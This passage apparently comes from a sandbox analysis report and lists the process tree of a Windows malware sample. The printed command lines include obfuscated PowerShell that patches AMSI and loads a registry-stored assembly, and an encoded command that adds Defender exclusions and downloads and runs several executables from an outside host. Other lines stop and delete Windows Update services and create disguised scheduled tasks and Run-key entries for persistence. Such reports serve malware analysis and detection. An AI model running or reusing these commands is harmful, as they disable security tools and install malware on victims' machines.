''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $ZJiqJqSragC.CreateType();}$JsVRpBhgdYqrO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+'m.'+'d'+''+'l'+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+'2'+''+'.'+''+[Char](85)+'n'+'s'+''+'a'+''+'f'+'e'+'J'+''+[Char](115)+''+'V'+'R'+'p'+''+'B'+''+[Char](104)+'g'+[Char](100)+'Y'+[Char](113)+''+[Char](114)+''+[Char](79)+'');$bYiaZkpUIYDMyO=$JsVRpBhgdYqrO.GetMethod(''+[Char](98)+'Yi'+[Char](97)+'Z'+[Char](107)+''+[Char](112)+''+[Char](85)+''+'I'+'Y'+[Char](68)+''+'M'+''+[Char](121)+'O',[Reflection.BindingFlags]'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,'+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FdTuXxcKPUZgtvxsREL=hhqotgSaPHVU @([String])([IntPtr]);$FCLoVxmlDzNZrJtVqHvAUm=hhqotgSaPHVU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pOZVKHAgjpj=$JsVRpBhgdYqrO.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+'el'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$tkPpigAlwwficN=$bYiaZkpUIYDMyO.Invoke($Null,@([Object]$pOZVKHAgjpj,[Object](''+[Char](76)+'oa'+'d'+''+[Char](76)+''+'i'+''+[Char](98)+''+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$EWwnbQtogexTsCyGr=$bYiaZkpUIYDMyO.Invoke($Null,@([Object]$pOZVKHAgjpj,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+'l'+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$YVoWFAS=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tkPpigAlwwficN,$FdTuXxcKPUZgtvxsREL).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+'l');$OGKiTsbyPTlNsSpPS=$bYiaZkpUIYDMyO.Invoke($Null,@([Object]$YVoWFAS,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+'f'+'f'+''+'e'+'r')));$TNuLrBEiXO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EWwnbQtogexTsCyGr,$FCLoVxmlDzNZrJtVqHvAUm).Invoke($OGKiTsbyPTlNsSpPS,[uint32]8,4,[ref]$TNuLrBEiXO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$OGKiTsbyPTlNsSpPS,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EWwnbQtogexTsCyGr,$FCLoVxmlDzNZrJtVqHvAUm).Invoke($OGKiTsbyPTlNsSpPS,[uint32]8,0x20,[ref]$TNuLrBEiXO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+'E').GetValue(''+'d'+'ia'+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+'t'+[Char](97)+''+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:176
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NayXeqMFpIsJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$tTXltWRjjuHBbg,[Parameter(Position=1)][Type]$urNHmAzqwI)$rlcoHkbEeTx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fl'+'e'+''+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+'r'+''+[Char](121)+''+[Char](77)+'o'+'d'+''+'u'+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+'e'+'','C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'ed,'+[Char](65)+'n'+[Char](115)+''+[Char](105)+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$rlcoHkbEeTx.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+'lN'+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g,P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$tTXltWRjjuHBbg).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$rlcoHkbEeTx.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+'e','P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+','+'Hi'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+'ot,'+'V'+''+'i'+''+'r'+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$urNHmAzqwI,$tTXltWRjjuHBbg).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+'e'+','+'M'+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $rlcoHkbEeTx.CreateType();}$RoqQBnLFTNnhY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+'t'+''+[Char](101)+''+'m'+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+'n'+'s'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](82)+'o'+'q'+''+'Q'+'B'+'n'+''+[Char](76)+''+[Char](70)+'T'+[Char](78)+''+'n'+''+'h'+'Y');$EWmZVYJHDWfIhM=$RoqQBnLFTNnhY.GetMethod(''+[Char](69)+''+[Char](87)+''+[Char](109)+'Z'+'V'+''+[Char](89)+''+'J'+''+[Char](72)+''+[Char](68)+''+[Char](87)+''+[Char](102)+''+[Char](73)+''+[Char](104)+'M',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+'b'+'li'+[Char](99)+''+[Char](44)+''+'S'+''+'t'+'a'+[Char](116)+''+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$nPAqutWecHewMlQjsFm=NayXeqMFpIsJ @([String])([IntPtr]);$lHhRDFHDRKPCkvLYYuIVPL=NayXeqMFpIsJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XmxLrxKJTln=$RoqQBnLFTNnhY.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+'l'+[Char](101)+'H'+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+''+'e'+'l'+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+'l'+'')));$QTubulMtlkMgSK=$EWmZVYJHDWfIhM.Invoke($Null,@([Object]$XmxLrxKJTln,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+'L'+[Char](105)+''+'b'+''+[Char](114)+''+'a'+'r'+'y'+''+[Char](65)+'')));$xbsmsUfFCaGOtzLSW=$EWmZVYJHDWfIhM.Invoke($Null,@([Object]$XmxLrxKJTln,[Object](''+[Char](86)+''+'i'+''+'r'+'t'+[Char](117)+'a'+'l'+''+'P'+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+'c'+[Char](116)+'')));$IIYhrVV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QTubulMtlkMgSK,$nPAqutWecHewMlQjsFm).Invoke(''+[Char](97)+''+'m'+'s'+'i'+''+[Char](46)+''+'d'+''+[Char](108)+'l');$PNOqFRmBuJFrkySjN=$EWmZVYJHDWfIhM.Invoke($Null,@([Object]$IIYhrVV,[Object]('Amsi'+'S'+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$EpItFEMBzE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xbsmsUfFCaGOtzLSW,$lHhRDFHDRKPCkvLYYuIVPL).Invoke($PNOqFRmBuJFrkySjN,[uint32]8,4,[ref]$EpItFEMBzE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$PNOqFRmBuJFrkySjN,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xbsmsUfFCaGOtzLSW,$lHhRDFHDRKPCkvLYYuIVPL).Invoke($PNOqFRmBuJFrkySjN,[uint32]8,0x20,[ref]$EpItFEMBzE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+''+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+'i'+[Char](97)+''+[Char](108)+''+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1420
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
PID:2072
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1212
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1384
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2388
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1608
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1616
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵PID:1692
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1792
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1924
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1976
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1672
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2696
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2588
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2644 -
C:\Users\Admin\AppData\Local\Temp\b405694fbedc3ed57f486a0bd892fb48b2917d49.exe"C:\Users\Admin\AppData\Local\Temp\b405694fbedc3ed57f486a0bd892fb48b2917d49.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB5AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB0AGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBlAGsAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGwAbQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgBoAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdAB2AGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBiAGMAagAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGgAbwBwAHQAbwAuAG8AcgBnAC8AdwBvAHcALwAxAC8AMgAvADMALwA0AC8ANQAvADYALwA3AC8AQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwAsACAAPAAjAHMAbQBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeAB5AGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABqAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAHIAegB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAdAB1AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGwAbgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AGQAawAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcAB4AHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAeQBzAEEAcABwAC4AZQB4AGUAJwAsACAAPAAjAGQAawBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQBkAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwB5AHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwB5AHMAQQBwAHAALgBlAHgAZQAnACkAKQA8ACMAZgBmAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBuAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAdwBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAHcAaABrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAagB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAPAAjAHIAawBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAdQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBnAHUAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAPAAjAG0AegBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAegB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AHUAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAcwBhAGcAIwA+AA=="4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:940 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 940 -s 2126⤵
- Program crash
PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
PID:4780
-
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4696
-
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1416 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
- Creates scheduled task(s)
PID:3728 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3248
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 2683⤵
- Program crash
PID:3400
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4728
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4908
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:1576
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4188
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:3012
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:1628
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4576
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2448
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3040
-
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4596
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:4788
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3188
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3384
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3384 -s 1482⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1496
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3552
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵PID:2256
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:4772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4244
-
